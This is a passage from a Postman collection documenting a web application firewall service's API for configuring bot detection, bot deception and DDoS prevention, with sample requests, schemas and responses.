\"result\": {\n        \"_status\": \"disable\",\n        \"keyboard\": \"enable\",\n        \"event-collection-time\": 10,\n        \"bot-effective-time\": 2,\n        \"scroll\": \"disable\",\n        \"mouse-movement\": \"enable\",\n        \"screen-touch\": \"enable\",\n        \"click\": \"disable\",\n        \"template_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"url-list\": [\n        \t{\"name\": \"1\", \"url\": \"/test\"}\n        ]\n    }\n}"}],"_postman_id":"c78064cc-9c9e-446b-93e4-1f318b0fd965"},{"name":"Update Biometrics Based Detection","id":"f884370f-758e-4130-b334-40f780fef333","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"keyboard\":\"enable\",\n\t\"event-collection-time\":15,\n\t\"url-list\":[\n\t\t{\"name\":\"1\",\"url\":\"/test\"}\n\t],\n\t\"bot-effective-time\":5,\n\t\"scroll\":\"enable\",\n\t\"mouse-movement\":\"enable\",\n\t\"screen-touch\":\"enable\",\n\t\"click\":\"enable\",\n\t\"action\": \"alert\",\n\t\"template_status\":\"disable\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/biometricsbaseddetection","description":"<p>Update the information about biometrics based detection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable biometrics based detection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"mouse-movement\": {\n            \"description\": \"Configure to enable or disable mouse-movement event\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"enalbe\"\n        },\n        \"click\": {\n            \"description\": \"Configure to enable or disable click event\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"enable\"\n        },\n        \"keyboard\": {\n            \"description\": \"Configure to enable or disable keyboard event\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"enable\"\n        },\n        \"screen-touch\": {\n            \"description\": \"Configure to enable or disable screen-touch event\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"scroll\": {\n            \"description\": \"Configure to enable or disable scroll event\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"event-collection-time\": {\n            \"description\": \"Specify the time period that the events will be collected from the client.\",\n            \"type\": \"integer\",\n            \"default\": 15,\n            \"minimum\": 10,\n            \"maximum\": 60\n        },\n        \"bot-effective-time\": {\n            \"description\": \"For the identified bot, choose the time period before TIM Host Protection tests and verifies the bot again\",\n            \"type\": \"integer\",\n            \"default\": 5,\n            \"minimum\": 1,\n            \"maximum\": 5\n        },\n        \"action\": {\n            \"description\": \"Select which action TIM Host Protection will take when it detects a violation of the policy\",\n            \"type\": \"string\",\n            \"default\": \"alert_deny\",\n            \"enum\": [\"alert\", \"deny_erase_no_log\", \"alert_erase\"]\n        },\n        \"url-list\": {\n            \"description\": \"The request URL list.\",\n            \"type\": \"array\",\n            \"required\": [\"_status\", \"mouse-movement\", \"click\", \"keyboard\", \"screen-touch\", \"scroll\",\"event-collection-time\", \"bot-effective-time\", \"action\"],\n            \"maxItems\": 12,\n            \"uniqueItems\": true,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"name\"],\n                \"properties\": {\n                    \"name\": {\n                        \"description\": \"The sequence number of the request URL\",\n                        \"type\": \"integer\"\n                    },\n                    \"url\": {\n                        \"description\": \"The request URL\",\n                        \"type\": \"string\"\n                    }\n                }\n            }\n        }\n        \n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","biometricsbaseddetection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"0a5521a8-0edf-4010-b96f-dde7b587afcb","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"keyboard\":\"enable\",\n\t\"event-collection-time\":15,\n\t\"url-list\":[\n\t\t{\"name\":\"1\",\"url\":\"/test\"}\n\t],\n\t\"bot-effective-time\":5,\n\t\"scroll\":\"enable\",\n\t\"mouse-movement\":\"enable\",\n\t\"screen-touch\":\"enable\",\n\t\"click\":\"enable\",\n\t\"action\": \"alert\",\n\t\"template_status\":\"disable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/biometricsbaseddetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","biometricsbaseddetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"},{"id":"fffe3b17-d847-47ab-80b3-f9d36a76585d","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"keyboard\":\"enable\",\n\t\"event-collection-time\":15,\n\t\"url-list\":[\n\t\t{\"name\":\"1\",\"url\":\"/test\"}\n\t],\n\t\"bot-effective-time\":5,\n\t\"scroll\":\"enable\",\n\t\"mouse-movement\":\"enable\",\n\t\"screen-touch\":\"enable\",\n\t\"click\":\"enable\",\n\t\"template_status\":\"disable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/biometricsbaseddetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","biometricsbaseddetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'action': 'must be contained'}\"\n}"}],"_postman_id":"f884370f-758e-4130-b334-40f780fef333"},{"name":"Get Bot Deception","id":"5ef088d5-3d80-423f-a700-2038bb631572","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","description":"<p>Get the configuration information of bot deception.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","botdeception"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"08a5ad99-26eb-4dbf-ab91-ba49720a3bb5","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdeception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:44:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"00bac1c3-9340-11e9-a71e-7bb947d6e9fb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkpL2HcroAMF8Ww="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"17595da2-47ce-45b8-8707-57b722ebb7d4","name":"Success","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdeception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:43:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"76"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"eadaa11b-933f-11e9-a972-1fdfcf3d15ff"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpGHHREoAMFQUQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b555a-e8701e13aa9b1e6c2060b3f4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n  \"detail\": \"successfully\",\n  \"result\": {\n    \"_status\": \"enable\",\n    \"template_status\": \"enable\",\n    \"action\": \"alert\",\n    \"botdeception\": {\n      \"block-period\": 600,\n      \"url-list\": [\n        {\n          \"name\": \"1\",\n          \"type\": \"regex-expression\",\n          \"url\": \"/t1\"\n        },\n        {\n          \"name\": \"2\",\n          \"type\": \"regex-expression\",\n          \"url\": \"/t2\"\n        }\n      ],\n      \"deception-url\": \"/TU\"\n    }\n  }\n}"}],"_postman_id":"5ef088d5-3d80-423f-a700-2038bb631572"},{"name":"Update Bot Deception","id":"4edbef1a-f464-4715-84b6-b29f16940e69","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"_status\": \"enable\",\n  \"template_status\": \"disable\",\n  \"action\": \"alert\",\n  \"botdeception\": {\n    \"url-list\": [\n      {\n        \"type\": \"regex-expression\",\n        \"url\": \"/t1\"\n      }\n    ],\n    \"deception-url\": \"/TU\"\n  }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","description":"<p>Update the information about bot deception.\nA sample body is added to the request that conforms to the following JSON schema</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"_status\": \"enable\",\n  \"template_status\": \"disable\",\n  \"action\": \"alert\",\n  \"botdeception\": {\n    \"url-list\": [\n      {\n        \"type\": \"regex-expression\",\n        \"url\": \"/t1\"\n      }\n    ],\n    \"deception-url\": \"/TU\"\n  }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires <a href=\"#authentication\">Token</a> as <code>authorization</code> request header.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","botdeception"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"0796e47d-427d-414b-b071-c8ec585f6fc2","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n  \"_status\": \"enable\",\n  \"template_status\": \"disable\",\n  \"action\": \"alert\",\n  \"botdeception\": {\n    \"url-list\": [\n      {\n        \"type\": \"regex-expression\",\n        \"url\": \"/t1\"\n      }\n    ],\n    \"deception-url\": \"/TU\"\n  }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdeception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:45:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2dfa9ef0-9340-11e9-800b-7784b92e5419"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpXuEpBoAMF5uQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55cb-4501fc0c64d230e81ce23f41;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"cfe94a97-cf3d-453c-ae66-7ca84126d684","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n  \"_status\": \"enable\",\n  \"template_status\": \"disable\",\n  \"action\": \"alert\",\n  \"botdeception\": {\n    \"url-list\": [\n      {\n        \"type\": \"regex-expression\",\n        \"url\": \"/t1\"\n      }\n    ],\n    \"deception-url\": \"/TU\"\n  }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdeception","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdeception"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:46:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"50"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"399affb7-9340-11e9-b8d2-9fca7b4f4748"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpaxEDToAMF2WQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55de-23d385f47a226760769d5898;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'brute-login-occurrence-num': 'Occurrence number must between 1 and 100'}\"\n}"}],"_postman_id":"4edbef1a-f464-4715-84b6-b29f16940e69"},{"name":"Get DDos Prevention","id":"dc92ebe6-d118-4bfc-b357-8569074edb20","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"description":"<p>Token</p>\n","key":"Authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","description":"<p>Get the configuration information of DDos prevention.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ddosprevention"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"25d988cb-631b-49e6-b2f8-52d2d7693812","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ddosprevention"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 May 2019 02:52:02 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"94b92d20-7785-11e9-9f69-6984baa8ad2d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"ZwV81GlUIAMFr1A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"9244e937-b917-4aa6-ab18-f5441c71a5fb","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ddosprevention"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 May 2019 02:53:30 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"470"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c92ff61f-7785-11e9-bc3a-25d40d5735e4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZwWKlGwnIAMFwRw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdcd0aa-d567794a93dd319ecfa1bd80;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"application-layer-dos-prevention\": \"disable\",\n        \"layer4-access-limit-rule\": \"enable\",\n        \"access-limit-share-ip\": 500,\n        \"http-connection-flood-check-rule\": \"enable\",\n        \"http-connection-threshold\": 100,\n        \"http-request-flood-prevention-rule\": \"enable\",\n        \"access-limit-in-http-session\": 500,\n        \"bot-recognition\": \"real-browser-enforcement\",\n        \"block-period\": 600,\n        \"action\": \"block_period\",\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"dc92ebe6-d118-4bfc-b357-8569074edb20"},{"name":"Update DDos Prevention","id":"0fa4695c-1335-4011-a39f-360d94fe2269","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"application-layer-dos-prevention\": \"disable\",\n\t\n\t\"layer4-access-limit-rule\": \"enable\",\n\t\"access-limit-share-ip\": 50,\n\t\n\t\"http-connection-flood-check-rule\": \"enable\",\n\t\"http-connection-threshold\": 100,\n\t\n\t\"http-request-flood-prevention-rule\": \"enable\",\n\t\"access-limit-in-http-session\": 500,\n\t\n\t\"bot-recognition\": \"real-browser-enforcement\",\n\t\"block-period\": 999,\n\t\"action\": \"block_period\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","description":"<p>Update configuration information of DDos prevention. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"application-layer-dos-prevention\", \"layer4-access-limit-rule\", \"access-limit-share-ip\", \"http-connection-flood-check-rule\", \"http-connection-threshold\", \"http-request-flood-prevention-rule\", \"access-limit-in-http-session\",\n        \"bot-recognition\", \"block-period\", \"action\"],\n    \"properties\": {\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"application-layer-dos-prevention\": {\n            \"description\": \"Configure to enable or disable DDoS protection\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"layer4-access-limit-rule\": {\n            \"description\": \"Configure to limit the number of HTTP requests per second from a certain IP\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"access-limit-share-ip\": {\n            \"description\": \"Type a rate limit for the maximum number of HTTP requests per second from each source IP address that is a single HTTP client\",\n            \"type\": \"integer\",\n            \"minimum\": 1,\n            \"maximum\": 65535,\n            \"default\": 1000\n        },\n        \"http-connection-flood-check-rule\": {\n            \"description\": \"Configure to limit the number of TCP connections with the same session cookie\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"http-connection-threshold\": {\n            \"description\": \"Type the maximum number of TCP connections allowed with a single HTTP client\",\n            \"type\": \"integer\",\n            \"minimum\": 1,\n            \"maximum\": 1024,\n            \"default\": 100\n        },\n        \"http-request-flood-prevention-rule\": {\n            \"description\": \"Configure to limit the number of HTTP connections with the same session cookie\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"access-limit-in-http-session\": {\n            \"description\": \"The maximum rate of requests per second allowed from a single HTTP client\",\n            \"type\": \"integer\",\n            \"minimum\": 0,\n            \"maximum\": 4096,\n            \"default\": 500\n        },\n        \"bot-recognition\": {\n            \"description\": \"Select real-browser-enforcement or captcha-enforcement\",\n            \"type\": \"string\",\n            \"enum\": [\"real-browser-enforcement\", \"captcha-enforcement\", \"disabled\"],\n            \"default\": \"real-browser-enforcement\"\n        },\n        \"block-period\": {\n            \"description\": \"The number of seconds that you want to block subsequent requests from the client after TIM Host Protection detects that the client has violated the rule\",\n            \"type\": \"integer\",\n            \"minimum\": 1,\n            \"maximum\": 3600,\n            \"default\": 600\n        },\n        \"action\": {\n            \"description\": \"Select which action the TIM Host Protection will take when it detects a violation of the rule.\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\", \"block_period\"],\n            \"default\": \"block_period\"\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ddosprevention"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"b3810690-9843-4ce1-aa2f-7a06def25304","name":"Parameter Check Error","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"application-layer-dos-prevention\": \"disable\",\n\t\n\t\"layer4-access-limit-rule\": \"enable\",\n\t\"access-limit-share-ip\": 50,\n\t\n\t\"http-connection-flood-check-rule\": \"enable\",\n\t\"http-connection-threshold\": 10000,\n\t\n\t\"http-request-flood-prevention-rule\": \"enable\",\n\t\"access-limit-in-http-session\": 500,\n\t\n\t\"layer4-connection-flood-check-rule\": \"enable\",\n\t\"layer4-connection-threshold\": 255,\n\t\n\t\"bot-recognition\": \"real-browser-enforcement\",\n\t\"block-period\": 999,\n\t\"action\": \"block_period\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ddosprevention"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 May 2019 09:49:23 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"97"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e259b761-77bf-11e9-8c06-bbb468667125"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZxTFfHRhIAMFYsw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdd3223-64aa21b26d04d5801c8e086e;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'http-connection-threshold': 'Error value range, only allow 1-1024'}\"\n}"},{"id":"c6bdf177-4bf9-460d-b69f-abc61a7fac40","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"application-layer-dos-prevention\": \"disable\",\n\t\n\t\"layer4-access-limit-rule\": \"enable\",\n\t\"access-limit-share-ip\": 50,\n\t\n\t\"http-connection-flood-check-rule\": \"enable\",\n\t\"http-connection-threshold\": 100,\n\t\n\t\"http-request-flood-prevention-rule\": \"enable\",\n\t\"access-limit-in-http-session\": 500,\n\t\n\t\"layer4-connection-flood-check-rule\": \"enable\",\n\t\"layer4-connection-threshold\": 255,\n\t\n\t\"bot-recognition\": \"real-browser-enforcement\",\n\t\"block-period\": 999,\n\t\"action\": \"block_period\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ddosprevention"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 May 2019 09:51:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"25c0338d-77c0-11e9-b2ea-8d1f69764b1a"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"ZxTXKGE_oAMF0HA="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"d5270ba3-c321-4fdc-b9a3-fd22b602ea71","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"application-layer-dos-prevention\": \"disable\",\n\t\n\t\"layer4-access-limit-rule\": \"enable\",\n\t\"access-limit-share-ip\": 50,\n\t\n\t\"http-connection-flood-check-rule\": \"enable\",\n\t\"http-connection-threshold\": 100,\n\t\n\t\"http-request-flood-prevention-rule\": \"enable\",\n\t\"access-limit-in-http-session\": 500,\n\t\n\t\"layer4-connection-flood-check-rule\": \"enable\",\n\t\"layer4-connection-threshold\": 255,\n\t\n\t\"bot-recognition\": \"real-browser-enforcement\",\n\t\"block-period\": 999,\n\t\"action\": \"block_period\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ddosprevention","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ddosprevention"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 May 2019 09:44:36 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"3741f8be-77bf-11e9-a58e-9f97dfb72fbd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZxSYpGYBoAMFzpg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdd3104-22f50f69536cf18f692c606b;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"0fa4695c-1335-4011-a39f-360d94fe2269"},{"name":"Get Custom Rule","id":"8ffada1d-9b54-411a-9c57-da545cf01e92","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/customrule","description":"<p>Get the information of custom rule.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.}</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","customrule"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"1a0346bc-b2db-4399-8a51-df98ab0f3ad4","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic 